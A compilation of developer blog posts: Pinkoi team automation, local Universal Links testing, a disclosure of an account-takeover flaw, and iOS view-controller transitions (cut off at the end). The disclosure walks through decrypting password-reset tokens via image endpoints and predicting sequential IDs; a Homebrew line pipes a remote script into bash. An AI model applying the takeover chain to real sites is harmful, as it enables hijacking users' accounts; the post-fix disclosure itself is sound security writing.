p.s. The purpose of RFC is to improve work efficiency, so it shouldn’t be too lengthy or seriously delay work progress; it can be thought of as a simple pre-work discussion phase.
Having consolidated the team's internal interface consensus, I finally want to mention the Crash Theory mindset, which I think is a good behavioral benchmark.
Applying it to the team means assuming that if everyone suddenly disappeared today, can the existing code, processes, and systems allow new people to quickly get up to speed?
To recap the meaning of interfaces: within the team, interfaces are used to increase mutual consensus; in external collaboration, they reduce ineffective communication, letting work proceed without interruption and keeping discussion focused on the requirements.
Reiterating that “interface communication” is not a special term or tool in engineering, it’s just a concept applicable to collaboration in any job scenario, it can simply be a document or process, with the sequence being to have this thing first and then communicate.
Assuming each additional communication time takes 10 minutes, with a team of 60 people, occurring 10 times per month, it wastes 1,200 hours per year on unnecessary communication.
The second chapter wants to share with everyone about the effects of automating repetitive work on improving work efficiency, using iOS as an example, but the same applies to Android.
It won’t mention technical implementation details, only discussing the feasibility in principle.
Organizing the services we use, including but not limited to:
The first issue to address is the problem of repetitiveness. During the development phase, when we want to allow other team members to test the app in advance, the traditional approach is to directly build it on their phones. If there are only 1-2 people, it’s not a big problem. However, if there are 20-30 team members to test, just helping with installing the beta version would take up a whole day of work. Additionally, if there are updates, everything has to start over.
Another method is to use TestFlight as a medium for distributing beta versions, which is also good. However, there are two issues. First, TestFlight is equivalent to the production environment, not the debug environment. Second, when there are many teammates working on different requirements simultaneously and needing to test different requirements, TestFlight can become chaotic, and the builds for distribution may change frequently, but it’s still manageable.
Pinkoi’s solution is to separate the task of “installing beta versions by the App Team” and use Slack Workflow as an input UI to achieve this. After inputting the necessary information, it triggers Bitrise to run Fastlane scripts to package and upload the beta version IPA to Firebase App Distribution.
For more information on using Slack Workflow applications, refer to this article: Building a Fully Automated WFH Employee Health Status Reporting System with Slack
Firebase App Distribution
Teammates who need to test simply follow the steps provided by Firebase App Distribution to install the necessary certificates, register their devices, and then choose the beta version they want to install or directly install it by clicking the link.
However, please note that iOS Firebase App Distribution is limited to Development Devices, with a maximum registration of 100 devices, based on devices rather than individuals.
Therefore, you may need to consider a balance between this solution and TestFlight (which allows external testing by up to 1,000 people).
At least, the Slack Workflow UI Input mentioned earlier is worth considering.
For advanced features, consider developing a Slack Bot for a more complete and customizable workflow and form usage.
Recap the effectiveness of automating the release of beta versions, the most significant benefit is moving the entire process to the cloud for execution, allowing the App Team to be hands-off and fully self-service.
The second common task for the App Team is packaging and submitting the official version of the app for review.
When the team is small and follows a single-line development approach, managing app version updates is not a big issue and can be done freely and regularly.
However, in larger teams with multiple concurrent development and iteration needs, the situation depicted above may arise. Without proper “interface communication” as mentioned earlier, everyone may work independently, leading to the App Team being overwhelmed. The cost of app updates is higher than web updates, the process is more complex, and frequent and disorderly updates can disrupt users.
The final issue is management. Without a fixed process or timeline, it’s challenging to optimize each step.
The solution is to introduce a Release Train into the development process, with the core concept of separating version updates from project development.
We establish a fixed schedule and define what will be done at each stage:
The actual timeline for QA and the release cycle (weekly, bi-weekly, monthly) can be adjusted according to each company’s situation. The key is to determine what needs to be done at specific times.
This is a survey on version release cycles conducted by foreign peers, with most opting for a bi-weekly release.
When it comes to weekly updates and our multiple teams, it will be as shown in the image above.
The Release Train, as the name suggests, is like a train station, and each version is a train.
If you miss it, you have to wait for the next one. Each Squad team and project choose their own time to board.
This is a great communication interface, as long as there is consensus and adherence to the rules, version updates can proceed smoothly.
For more technical details on Release Train, please refer to:
Once the process and schedule are determined, we can optimize what we do at each stage.
For example, packaging the official version manually is time-consuming. The entire process from packaging, uploading, to submission takes about 1 hour. During this time, work status needs to be constantly switched, making it difficult to do other tasks; this process is repeated for each packaging, wasting work efficiency.
Now that we have a fixed schedule, we directly integrate Google Calendar here. We add the tasks to be done at the expected schedule to the calendar. When the time comes, Google Apps Script will call Bitrise to execute the Fastlane script for packaging the official version and submission, completing all the work.
Using Google Calendar integration has another benefit. If there are unexpected situations that require postponement or advancement, you can directly go in and change the date.
To automatically execute Google Apps Script when the Google Calendar event time arrives, currently, you have to set up the service yourself. If you need a quick solution, you can use IFTTT as a bridge between Google Calendar <-> Bitrise/Google Apps Script. For the method, you can refer to this article.
p.s.
Here, more applications of Google App Scripts are mentioned. For details, please refer to: Forwarding Gmail emails to Slack using Google Apps Script.
The last one is using Github Action to enhance collaboration efficiency (PR Review).
Github Action is Github’s CI/CD service, which can be directly linked to Github events, triggered from open issues, open PRs, to merging PRs, and more.
Github Action can be used for any Git project hosted on Github. There are no restrictions for Public Repos, and Private Repos have a free quota of 2,000 minutes per month.
Here are two features:
Github Action still has many automation projects that can be done, and everyone can unleash their imagination.
Like the issue bot commonly seen in open-source projects:
Or automatically closing PRs that haven’t been merged for too long can also be done using Github Action.
Recapping the effectiveness of automating the packaging of the official version, simply use existing tools for integration; in addition to automation, also incorporate fixed processes to double work efficiency.
Apart from the manual packaging time, there is actually an additional cost in communicating version times, which is now directly reduced to 0; as long as you ensure to get on board within the schedule, you can focus all your time on “discussions” and “development”.
Calculating the effectiveness brought by these two automations, it can save 216 working hours per year.
Automating along with the communication interface mentioned earlier, let’s see how much efficiency can be improved by doing all these tasks together.
Apart from the tasks just done, we also need to evaluate the cost of switching flow. When we continue to work for a period of time, we enter a “flow” state, where our thoughts and productivity peak, providing the most effective output; but if we are interrupted by unnecessary things (e.g., redundant communication, repetitive work), to get back into the flow, it will take some time again, using 30 minutes as an example here.
The cost of switching flow due to unnecessary interruptions should also be included in the calculation, taking 30 minutes each time, occurring 10 times a month, 60 people will waste an additional 3,600 hours per year.
Flow switching cost (3,600) + unnecessary communication due to poor communication interface (1,200) + automation solving repetitive work (216) = a loss of 5,016 hours in a year.
The time saved from previously wasted work hours can be invested in other, more valuable tasks, so actual productivity should increase by even more, on the order of another 200%.
Especially as the team continues to grow, the impact on work efficiency also magnifies.
Optimize early, enjoy early benefits; late optimization has no discount!!
To recap the behind-the-scenes of a high-efficiency working team, here is what we mainly did.
No Code/Low Code First: prioritize integrating existing tools (as in these examples); only if no suitable tool exists, evaluate the cost of building the automation against the time it actually saves.
Everyone can be a problem-solving leader at Pinkoi
Solving problems and driving change mostly requires a lot of teamwork to make things better, and that in turn needs the support and encouragement of the company culture; otherwise it is very difficult to push forward alone.
At Pinkoi, everyone can be a problem-solving leader, you don’t have to be a Lead or PM to solve problems, many of the communication interfaces, tools, or automation projects introduced earlier were discovered by teammates, proposed solutions, and completed together.
About how team culture supports driving change, the four stages of problem-solving can all be linked to Pinkoi’s Core Values.
Step One: Grow Beyond Yesterday
Next is Build Partnerships
Step Three: Impact Beyond Your Role
Lastly, Dare to Fail!
The above is a sharing of the secrets of Pinkoi’s high-efficiency engineering team. Thank you all.
Join Pinkoi now >>> https://www.pinkoi.com/about/careers
For any questions and feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
iOS 13, iOS 14 What’s New with Universal Links & Setting Up a Local Testing Environment
Photo by NASA
For a service that has both a website and an app, the functionality of Universal Links is crucial for user experience, achieving seamless integration between the web and the app. However, it has always been set up simply without much emphasis. Recently, I spent some time researching and documenting some interesting things.
In the services I have worked on, the main consideration when implementing Universal Links is that the app does not cover all of the website's functionality. Universal Links match on the domain name; as long as the domain matches, the app is opened. To address this, you can exclude the URLs for which the app has no corresponding functionality. If the website's service URLs are too varied, it may be better to create a dedicated subdomain just for Universal Links.
Regarding the update mechanism of Apple CDN, after checking the documentation, there is no mention of it. In a discussion, the official response was only “regular updates” with details to be released in the documentation… but I have not seen it yet.
I would personally guess it takes at least 48 hours to update, so if you make changes to apple-app-site-association, it is recommended to deploy them online a few days before the app update is released.
Headers: Host=app-site-association.cdn-apple.com
GET https://app-site-association.cdn-apple.com/a/v1/your-domain

You can see the version currently cached on Apple's CDN. (Remember to add the request header Host=app-site-association.cdn-apple.com.)
Due to the aforementioned CDN issue, how can we debug during the development phase?
Fortunately, Apple provides a solution for this, otherwise it would be really frustrating not being able to update in real time: we just need to append ?mode=developer after applinks:domain.com. There are also managed (for enterprise internal apps) and developer+managed modes that can be set.

After adding mode=developer, the app fetches the latest apple-app-site-association directly from the website every time you Build & Run on the simulator.
If you want to Build & Run on a real device, you need to go to “Settings” -> “Developer” -> enable the “Associated Domains Development” option.
⚠️ There is a pitfall here: apple-app-site-association can normally be placed in the root directory of the website or in the ./.well-known directory, but in mode=developer it only looks for ./.well-known/apple-app-site-association, which made me think it wasn't working.
If you are using iOS < 14, remember that after changing apple-app-site-association you need to delete the app and Build & Run again to fetch the latest version. For iOS ≥ 14, use the method described above and add mode=developer.
Ideally, you can modify the apple-app-site-association file on the server yourself. However, for those of us who sometimes cannot touch the server side, testing Universal Links becomes very troublesome: you have to keep bothering backend colleagues for help, and you need to be very sure of the apple-app-site-association content before going live, because changing it repeatedly will drive your colleagues crazy.
To solve the above problem, we can set up a small service locally.
First, install nginx on your Mac:
brew install nginx
If you haven’t installed brew yet, you can do so by running:
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
After installing nginx, go to /usr/local/etc/nginx/ and open the nginx.conf file for editing:
...omitted
server {
    listen       8080;
    server_name  localhost;

    #charset koi8-r;
    #access_log  logs/host.access.log  main;

    location / {
        root   /Users/yourusername/Documents;
        index  index.html index.htm;
    }
...omitted
Around line 44, change the root in location / to the directory you want (using Documents as an example here).
Listening on port 8080, no need to change if there are no conflicts.
Save the changes, then start nginx by running:
nginx
To stop it, run:
nginx -s stop
If you make changes to nginx.conf, remember to run:

nginx -s reload
to restart the service.
Create a ./.well-known directory inside the root directory you just configured, and place the apple-app-site-association file inside ./.well-known.
⚠️ If .well-known disappears after creation, note that on Mac you need to enable the "Show hidden files" feature:
In the terminal, run:
defaults write com.apple.finder AppleShowAllFiles TRUE
Then run killall Finder to restart Finder.
⚠️ The apple-app-site-association file may look like it has no extension but actually carry a hidden .json extension:
Right-click on the file -> “Get Info” -> “Name & Extension” -> Check for the extension and uncheck “Hide extension” if necessary.
Once confirmed, open the browser and test whether the apple-app-site-association file can be downloaded successfully from:

http://localhost:8080/.well-known/apple-app-site-association
If the download is successful, it means the local environment simulation is successful!
If you encounter a 404/403 error, please check whether the root directory is correct, whether the directory/file is placed correctly, and whether the apple-app-site-association file accidentally includes the .json extension.
Register & Download Ngrok
Extract the ngrok executable
Access the Dashboard page to execute Config settings
./ngrok authtoken YOUR_TOKEN
After setting up, run:
./ngrok http 8080
Because our nginx is on port 8080.
Start the service.
At this point, you will see a window showing the status of the service startup, and you can obtain the public URL assigned for this session from the Forwarding section.
⚠️ The assigned URL changes every time you start, so it can only be used for development testing purposes.
Here we will use the URL assigned for this session, https://ec87f78bec0f.ngrok.io/, as an example.
Return to the browser and enter https://ec87f78bec0f.ngrok.io/.well-known/apple-app-site-association
to see if you can successfully download and view the apple-app-site-association file. If everything is fine, you can proceed to the next step.
Enter the ngrok-assigned URL into the Associated Domains applinks: settings. Remember to add ?mode=developer for testing purposes (see the sketch below).
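As a concrete sketch of what that looks like (the host is just the example ngrok URL assigned above; in Xcode you type the same string into the Associated Domains list, and in the .entitlements file it is stored under the standard associated-domains key):

<key>com.apple.developer.associated-domains</key>
<array>
    <string>applinks:ec87f78bec0f.ngrok.io?mode=developer</string>
</array>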
Rebuild & Run the APP:
Open the browser and enter the corresponding Universal Links test URL (e.g., https://ec87f78bec0f.ngrok.io/buy/123
) to see the results.
If a 404 page appears, ignore it as we don’t actually have that page. We are testing if iOS matches the URL functionality as expected. If you see “Open” above, it means the match is successful. You can also test the reverse scenario.
Click “Open” to open the APP -> Test successful!
After testing OK in the development phase, confirming the modified apple-app-site-association file and handing it over to the backend for uploading to the server can ensure everything goes smoothly~
Finally, remember to change the Associated Domains applinks back to your real production site URL.
Additionally, we can also check whether the apple-app-site-association file is requested each time the APP Build & Run is executed from the ngrok status window:
The configuration file is relatively simple, and only the following content can be set:
{
  "applinks": {
    "apps": [],
    "details": [
      {
        "appID": "TeamID.BundleID",
        "paths": [
          "NOT /help/",
          "*"
        ]
      }
    ]
  }
}
Replace TeamID.BundleID with your project settings (ex: TeamID = ABCD, BundleID = li.zhgchg.demoapp => ABCD.li.zhgchg.demoapp).
If there are multiple appIDs, you need to add multiple entries in details (a sketch follows below).
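A rough sketch of what multiple entries look like in the old format (the second appID below is purely a hypothetical example):

{
  "applinks": {
    "apps": [],
    "details": [
      {
        "appID": "ABCD.li.zhgchg.demoapp",
        "paths": [ "*" ]
      },
      {
        "appID": "ABCD.li.zhgchg.demoapp.dev",
        "paths": [ "/buy/*" ]
      }
    ]
  }
}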
The paths section represents the matching rules, supporting the following syntax:
* : matches 0 or more characters, ex: /home/* (home/alan…)
? : matches exactly 1 character, ex: 201? (2010~2019)
?* : matches 1 or more characters, ex: /?* (/test, /home…)
NOT : excludes a rule, ex: NOT /help (any URL except /help)
You can combine these however the actual situation requires; for more information, refer to the official documentation.
- Please note, this is not Regex and does not support any Regex syntax.
- The old version does not support Query (?name=123) or Anchor (#title).
- Non-ASCII (e.g. Chinese) URLs must be converted to ASCII before being placed in paths (all characters in paths must be ASCII).
The functionality of the configuration file has been enhanced, with added support for Query/Anchor, character sets, and encoding handling.
{
  "applinks": {
    "details": [
      {
        "appIDs": [ "TeamID.BundleID" ],
        "components": [
          {
            "#": "no_universal_links",
            "exclude": true,
            "comment": "Matches any URL whose fragment equals no_universal_links and instructs the system not to open it as a universal link"
          },
          {
            "/": "/buy/*",
            "comment": "Matches any URL whose path starts with /buy/"
          },
          {
            "/": "/help/website/*",
            "exclude": true,
            "comment": "Matches any URL whose path starts with /help/website/ and instructs the system not to open it as a universal link"
          },
          {
            "/": "/help/*",
            "?": { "articleNumber": "????" },
            "comment": "Matches any URL whose path starts with /help/ and that has a query item with name 'articleNumber' and a value of exactly 4 characters"
          }
        ]
      }
    ]
  }
}
(The example above is copied from the official documentation.)
appIDs is now an array that can contain multiple appIDs, so you don't have to repeat the entire block as before.
WWDC mentioned backward compatibility: when iOS ≥ 13 reads the new format, it ignores the old paths.
The matching rules are now placed in components, supporting 3 types:
/ : URL path
? : Query, ex: ?name=123&place=tw
# : Anchor (fragment), ex: #title
They can be used together. For example, if only /user/?id=100#detail should open the app, it can be written as:
{
  "/": "/user/*",
  "?": { "id": "*" },
  "#": "detail"
}
The matching syntax remains the same as before, still supporting *, ?, and ?*.
A comment field was added for annotations to help identification (but note that this file is public and visible to anyone).
Exclusion is now specified with exclude: true.
A caseSensitive option was added to specify whether a rule is case-sensitive (default: true); turning it off can reduce the number of rules needed.
A percentEncoded option was added. As mentioned earlier, in the old format URLs had to be converted to ASCII before being placed in paths (Chinese characters become ugly and unrecognizable); this parameter specifies whether the system should percent-encode the value for us automatically (default: true), so a Chinese URL can be written in directly (ex: /customer service). A sketch combining these two options follows below.
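A minimal sketch of how these two options can appear inside components (the paths here are illustrative placeholders, not from the original article):

"components": [
  {
    "/": "/Help/*",
    "caseSensitive": false,
    "comment": "Matches /help/*, /HELP/*, etc. without extra rules"
  },
  {
    "/": "/客服/*",
    "percentEncoded": true,
    "comment": "percentEncoded (default true) lets the system percent-encode the non-ASCII path for us"
  }
]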
For detailed official documentation, refer to this.
Default character sets:
This is one of the important features of this update, adding support for character sets.
System-defined character sets:
$(alpha): A-Z and a-z
$(upper): A-Z
$(lower): a-z
$(alnum): A-Z, a-z, and 0–9
$(digit): 0–9
$(xdigit): hexadecimal characters, 0–9 and a,b,c,d,e,f,A,B,C,D,E,F
$(region): ISO region codes (isoRegionCodes), ex: TW
$(lang): ISO language codes (isoLanguageCodes), ex: zh
If our URL has multiple languages and we want them all to support universal links, we can set it up like this:
"components": [
  { "/" : "/$(lang)-$(region)/home" }
]
This way, both /zh-TW/home and /en-US/home will be supported, which is very convenient and saves writing a long list of rules!
Custom character sets:
In addition to the default character sets, we can also define custom character sets for increased configurability and readability.
Simply add substitutionVariables inside applinks:
{
  "applinks": {
    "substitutionVariables": {
      "food": [ "burrito", "pizza", "sushi", "samosa" ]
    },
    "details": [{
      "appIDs": [ ... ],
      "components": [
        { "/" : "/$(food)/" }
      ]
    }]
  }
}
In this example, a custom food character set is defined and used in the subsequent components.
The example can match /burrito, /pizza, /sushi, /samosa.
For more details, refer to this article in the official documentation.
If you don't have any inspiration for the content of the configuration file, you can secretly peek at other websites. Just append /apple-app-site-association or /.well-known/apple-app-site-association to the site's homepage URL to read its configuration.
For example: https://www.netflix.com/apple-app-site-association
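For instance, a quick way to peek at one from the terminal (any HTTP client works just as well):

curl https://www.netflix.com/apple-app-site-association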
When using a SceneDelegate, the entry point for opening universal links is in the SceneDelegate:

func scene(_ scene: UIScene, continue userActivity: NSUserActivity)
Instead of in the AppDelegate:

func application(_ application: UIApplication, continue userActivity: NSUserActivity, restorationHandler: @escaping ([UIUserActivityRestoring]?) -> Void) -> Bool
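As a minimal sketch of what the SceneDelegate handler might look like (the /buy/123 path parsing is just an illustrative assumption following the earlier test URL):

import UIKit

class SceneDelegate: UIResponder, UIWindowSceneDelegate {
    var window: UIWindow?

    func scene(_ scene: UIScene, continue userActivity: NSUserActivity) {
        // Universal links arrive as NSUserActivityTypeBrowsingWeb activities
        guard userActivity.activityType == NSUserActivityTypeBrowsingWeb,
              let url = userActivity.webpageURL,
              let components = URLComponents(url: url, resolvingAgainstBaseURL: true) else {
            return
        }

        // e.g. https://ec87f78bec0f.ngrok.io/buy/123 -> ["buy", "123"]
        let pathParts = components.path.split(separator: "/").map(String.init)
        if pathParts.first == "buy", let id = pathParts.last {
            print("Open the purchase page for item id: \(id)")
            // ...navigate to the corresponding view controller here
        }
    }
}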
If you have any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Website security issues caused by multiple vulnerabilities combined
Photo by Tarik Haiga
A few years ago, while still supporting web development, I was assigned the task of organizing a CTF competition for the company’s internal engineering team. Initially, the idea was to have teams attack and defend each other’s products, but as the organizer, I wanted to first understand the level of expertise. So, I conducted penetration tests on various company products to see how many vulnerabilities I could find, ensuring the event would run smoothly.
However, due to limited competition time and significant differences between engineering teams, the final questions were based on common engineering knowledge and interesting topics. Those interested can refer to my previous article, “ How to Create an Interesting Engineering CTF Competition “, which contains many mind-blowing questions!
I found a total of four vulnerabilities across three products. Besides the issue discussed in this article, I also discovered the following common website vulnerabilities:
All vulnerabilities were found through black-box testing. Only the product with the XSS issue was one I had participated in developing; I had no prior knowledge of the others or their code.
As a white-hat hacker, I reported all discovered issues to the engineering team immediately, and they were fixed. It’s been two years now, and I think it’s time to disclose this. However, to respect my former company’s position, I won’t mention which product had this vulnerability. Just focus on the discovery process and reasons behind it!
This vulnerability allows an attacker to arbitrarily change the target user’s password, log in to the target user’s account with the new password, steal personal information, and perform illegal operations.
As the title suggests, this vulnerability was triggered by a combination of multiple factors, including:
Since user emails are public information on the platform, we first browse the platform to find the target account’s email. After knowing the email, go to the password reset page.
Both actions will send out password reset verification emails.
Go to your email to receive your password reset verification email.
The change password link has the following URL format:
https://zhgchg.li/resetPassword.php?auth=PvrrbQWBGDQ3LeSBByd
PvrrbQWBGDQ3LeSBByd is the verification token for this password reset operation.
However, while observing the verification code image on the website, I noticed that the link format for the verification code image is also similar:
https://zhgchg.li/captchaImage.php?auth=6EqfSZLqDc
The auth value 6EqfSZLqDc renders a captcha image showing 5136.
What happens if we put our password reset token in? Who cares! Let’s try it!
Bingo!
But the captcha image is too small to get complete information.
Let’s keep looking for exploitable points…
The website, to prevent web scraping, displays users’ public profile email addresses as images. Keyword: images! images! images!
Let’s open it up and take a look:
Profile Page
Part of the Webpage Source Code
We also got a similar URL format result:
https://zhgchg.li/mailImage.php?mail=V3sDblZgDGdUOOBlBjpRblMTDGwMbwFmUT10bFN6DDlVbAVt
V3sDblZgDGdUOOBlBjpRblMTDGwMbwFmUT10bFN6DDlVbAVt shows zhgchgli@gmail.com.
Same thing, let’s stuff it in!
Bingo!🥳🥳🥳
PvrrbQWBGDQ3LeSBByd = 2395656
I thought, could it be a serial number…
So I entered the email again to request a password reset, decoded the new token from the received email, and got 2395657
… what the fxck… it really is.
Knowing it's a serial number makes things easier. The plan: first request a password reset email for my own account, then immediately request one for the target account; that way we can predict the target's password reset request ID.
Next, we just need to find a way to convert 2395657 back into a token!
The website only validates the email format on the frontend when editing data, without re-validating the format on the backend…
Bypassing the frontend validation, we change the email to the next target.
Fire in the hole!
We got:
https://zhgchg.li/mailImage.php?mail=UTVRZwZuDjMNPLZhBGI
Now, take this password reset token back to the password reset page:
Success! Bypassed verification to reset someone else’s password!
Finally, because there is no two-factor authentication or device binding feature; once the password is overwritten, you can log in directly and impersonate the user.
Let’s review the whole process.
The whole vulnerability discovery process surprised me, because many of the issues were basic design problems. Each feature seemed fine on its own, and each small hole looked harmless, but combining several small holes created a big one. It really pays to be careful during development.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Complete guide to pull-down to close, pull-up to appear, and full-page right swipe back effects in UIViewController
I’ve always been curious about how commonly used apps like Facebook, Line, Spotify, etc., implement effects such as “pull-down to close a presented UIViewController,” “pull-up to gradually appear a UIViewController,” and “full-page support for right swipe back.”
These effects are not built-in, and the pull-down to close feature only has system card style support starting from iOS 13.
Whether it’s due to not knowing the right keywords or the difficulty in finding the information, I could never find a clear implementation method for these features. The information I found was always vague and scattered, requiring piecing together from various sources.
When I first researched the method, I found the UIPresentationController
API. Without delving deeper into other resources, I used this method combined with UIPanGestureRecognizer
to achieve the pull-down to close effect in a rather crude way. It always felt off, like there should be a better way.
Recently, while working on a new project, I came across this article which broadened my horizons and revealed more elegant and flexible APIs.
This post serves as both a personal record and a guide for those who share my confusion.
The content is quite extensive. If you’re in a hurry, you can skip to the end for examples or directly download the GitHub project for study!
First, let's talk about the latest built-in effect. From iOS 13 onwards, UIViewController.present(_:animated:completion:) defaults to the UIModalPresentationAutomatic modalPresentationStyle for card-style presentation. If you want to keep the previous full-page presentation, you need to explicitly set it back to UIModalPresentationFullScreen.
Built-in Calendar Add Effect
A better user experience should check for unsaved data when triggering the pull-down to close action, prompting the user whether to discard changes before leaving.
Apple has thought of this for us. Simply implement the methods in UIAdaptivePresentationControllerDelegate
.
import UIKit

class DetailViewController: UIViewController {
    private var onEdit: Bool = true
    override func viewDidLoad() {
        super.viewDidLoad()

        // Set delegate
        self.presentationController?.delegate = self
        // if UIViewController is embedded in NavigationController:
        // self.navigationController?.presentationController?.delegate = self

        // Disable pull-down to close, method (1):
        self.isModalInPresentation = true
    }

}

// Delegate implementation
extension DetailViewController: UIAdaptivePresentationControllerDelegate {
    // Disable pull-down to close, method (2):
    func presentationControllerShouldDismiss(_ presentationController: UIPresentationController) -> Bool {
        return false
    }

    // Triggered when pull-down to close is blocked
    func presentationControllerDidAttemptToDismiss(_ presentationController: UIPresentationController) {
        if onEdit {
            let alert = UIAlertController(title: "Unsaved Data", message: nil, preferredStyle: .actionSheet)
            alert.addAction(UIAlertAction(title: "Discard and Leave", style: .default) { _ in
                self.dismiss(animated: true)
            })
            alert.addAction(UIAlertAction(title: "Continue Editing", style: .cancel, handler: nil))
            self.present(alert, animated: true)
        } else {
            self.dismiss(animated: true, completion: nil)
        }
    }
}
To disable pull-down-to-dismiss, you can either set the UIViewController property isModalInPresentation to true, or implement the UIAdaptivePresentationControllerDelegate method presentationControllerShouldDismiss and return false.
The UIAdaptivePresentationControllerDelegate method presentationControllerDidAttemptToDismiss is only called when a pull-down dismissal is attempted but prevented.
For the system, a card-style presented page is considered a Sheet, which behaves differently from FullScreen.
Assuming the RootViewController is HomeViewController, then in a card-style presentation (UIModalPresentationAutomatic):
When HomeViewController presents DetailViewController, HomeViewController's viewWillDisappear/viewDidDisappear will not be triggered.
When DetailViewController dismisses, HomeViewController's viewWillAppear/viewDidAppear will not be triggered.
⚠️ Since Xcode 11, apps built for iOS ≥ 13 present with the card style (UIModalPresentationAutomatic) by default.
If you previously placed any logic in viewWillAppear/viewWillDisappear/viewDidAppear/viewDidDisappear, be sure to check it carefully! ⚠️
After looking at the built-in system, let’s get to the main point of this article! How to achieve these effects yourself?
First, let’s organize where you can perform window transition animations.
UITabBarController/UIViewController/UINavigationController
We can set the delegate for a UITabBarController and implement the animationControllerForTransitionFrom method to apply custom transition effects when switching tabs in the UITabBarController.
The system default has no animation. The above demonstration shows a fade-in fade-out transition effect.
import UIKit

class MainTabBarViewController: UITabBarController {

    override func viewDidLoad() {
        super.viewDidLoad()
        self.delegate = self
    }

}

extension MainTabBarViewController: UITabBarControllerDelegate {
    func tabBarController(_ tabBarController: UITabBarController, animationControllerForTransitionFrom fromVC: UIViewController, to toVC: UIViewController) -> UIViewControllerAnimatedTransitioning? {
        // Return a custom UIViewControllerAnimatedTransitioning here, or nil for the default (no animation)
        return nil
    }
}
Naturally, when Presenting/Dismissing a UIViewController, you can specify the animation effect to apply; otherwise, this article wouldn't exist XD. However, it's worth mentioning that if you only want a Present animation without gesture control, you can directly use UIPresentationController for convenience and speed (see the references at the end of the article).
The system default is slide up to appear and slide down to disappear! If you customize it yourself, you can add effects such as fade-in, rounded corners, control of the appearance position, etc.
import UIKit

class HomeAddViewController: UIViewController {

    override func viewDidLoad() {
        super.viewDidLoad()

        self.modalPresentationStyle = .custom
        self.transitioningDelegate = self
    }

}

extension HomeAddViewController: UIViewControllerTransitioningDelegate {

    func animationController(forPresented presented: UIViewController, presenting: UIViewController, source: UIViewController) -> UIViewControllerAnimatedTransitioning? {
        // Return nil to use the default animation
        return nil // return the UIViewControllerAnimatedTransitioning animation to apply when presenting
    }

    func animationController(forDismissed dismissed: UIViewController) -> UIViewControllerAnimatedTransitioning? {
        // Return nil to use the default animation
        return nil // return the UIViewControllerAnimatedTransitioning animation to apply when dismissing
    }
}
Any UIViewController can implement transitioningDelegate to specify Present/Dismiss animations; UITabBarController, UINavigationController, UITableViewController, etc. can all do this.
UINavigationController is probably the one that needs animation customization the least, because the system's default slide-in on push and slide-back on pop are already the best effects. Customizing this part might be used to create seamless left-right switching effects between UIViewControllers.
Since we want to enable full-page gesture returns, we need to implement a custom Pop animation effect.
import UIKit

class HomeNavigationController: UINavigationController {

    override func viewDidLoad() {
        super.viewDidLoad()

        self.delegate = self
    }

}

extension HomeNavigationController: UINavigationControllerDelegate {
    func navigationController(_ navigationController: UINavigationController, animationControllerFor operation: UINavigationController.Operation, from fromVC: UIViewController, to toVC: UIViewController) -> UIViewControllerAnimatedTransitioning? {

        if operation == .pop {
            return nil // return the UIViewControllerAnimatedTransitioning animation to apply when popping
        } else if operation == .push {
            return nil // return the UIViewControllerAnimatedTransitioning animation to apply when pushing
        }

        // Return nil to use the default animation
        return nil
    }
}
Before discussing animation implementation and gesture control, let’s first talk about what interactive and non-interactive mean.
Interactive Animation: Gesture-triggered animations, such as UIPanGestureRecognizer
Non-interactive Animation: System-triggered animations, such as self.present( )
After discussing where animations can be applied, let’s look at how to create animation effects.
We need to implement the UIViewControllerAnimatedTransitioning protocol and animate the view within it.
Directly use UIView.animate for the animation handling. UIViewControllerAnimatedTransitioning needs to implement two methods: transitionDuration to specify the duration of the animation, and animateTransition to implement the animation content.
import UIKit

class SlideFromLeftToRightTransition: NSObject, UIViewControllerAnimatedTransitioning {

    func transitionDuration(using transitionContext: UIViewControllerContextTransitioning?) -> TimeInterval {
        return 0.4
    }

    func animateTransition(using transitionContext: UIViewControllerContextTransitioning) {

        // Available parameters:
        // Get the view content of the target UIViewController to be displayed:
        let toView = transitionContext.view(forKey: .to)
        // Get the target UIViewController to be displayed:
        let toViewController = transitionContext.viewController(forKey: .to)
        // Get the initial frame information of the target UIViewController's view:
        let toInitialFrame = transitionContext.initialFrame(for: toViewController!)
        // Get the final frame information of the target UIViewController's view:
        let toFinalFrame = transitionContext.finalFrame(for: toViewController!)

        // Get the view content of the current UIViewController:
        let fromView = transitionContext.view(forKey: .from)
        // Get the current UIViewController:
        let fromViewController = transitionContext.viewController(forKey: .from)
        // Get the initial frame information of the current UIViewController's view:
        let fromInitialFrame = transitionContext.initialFrame(for: fromViewController!)
        // Get the final frame information of the current UIViewController's view (during the closing animation this is the final frame from the earlier presenting animation):
        let fromFinalFrame = transitionContext.finalFrame(for: fromViewController!)

        // toView.frame.origin.y = UIScreen.main.bounds.size.height

        UIView.animate(withDuration: transitionDuration(using: transitionContext), delay: 0, options: [.curveLinear], animations: {
            // toView.frame.origin.y = 0
        }) { (_) in
            if !transitionContext.transitionWasCancelled {
                // Animation was not interrupted
            }

            // Notify the system that the animation is complete
            transitionContext.completeTransition(!transitionContext.transitionWasCancelled)
        }

    }

}
To and From:
Assume HomeViewController needs to Present/Push DetailViewController:
From = HomeViewController / To = DetailViewController
When DetailViewController needs to Dismiss/Pop:
From = DetailViewController / To = HomeViewController
⚠️⚠️⚠️⚠️⚠️
The official documentation recommends using the view from transitionContext.view rather than from transitionContext.viewController.view.
However, there is an issue when performing Present/Dismiss animations with modalPresentationStyle = .custom:
transitionContext.view(forKey: .from) is nil during Present, and transitionContext.view(forKey: .to) is nil during Dismiss; in those cases you still need to get the view from viewController.view.
⚠️⚠️⚠️⚠️⚠️
transitionContext.completeTransition(!transitionContext.transitionWasCancelled) must be called when the animation completes, otherwise the screen will freeze;
however, if UIView.animate has no executable animation, its completion handler is never called, so the method above never runs. Make sure the animation actually changes something (e.g., y from 100 to 0).
ℹ️ℹ️ℹ️ℹ️ℹ️
If the ToView/FromView involved in the animation is complex or misbehaves during the animation, you can use snapshotView(afterScreenUpdates:) to take a snapshot and animate that instead: take the snapshot, add it to the layer with transitionContext.containerView.addSubview(snapShotView), hide the original ToView/FromView (isHidden = true), and at the end of the animation call snapShotView.removeFromSuperview() and un-hide the original ToView/FromView (isHidden = false). A rough sketch follows below.
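A minimal sketch of that snapshot trick inside animateTransition (the frame changes and dismiss direction here are illustrative assumptions, not the article's final implementation):

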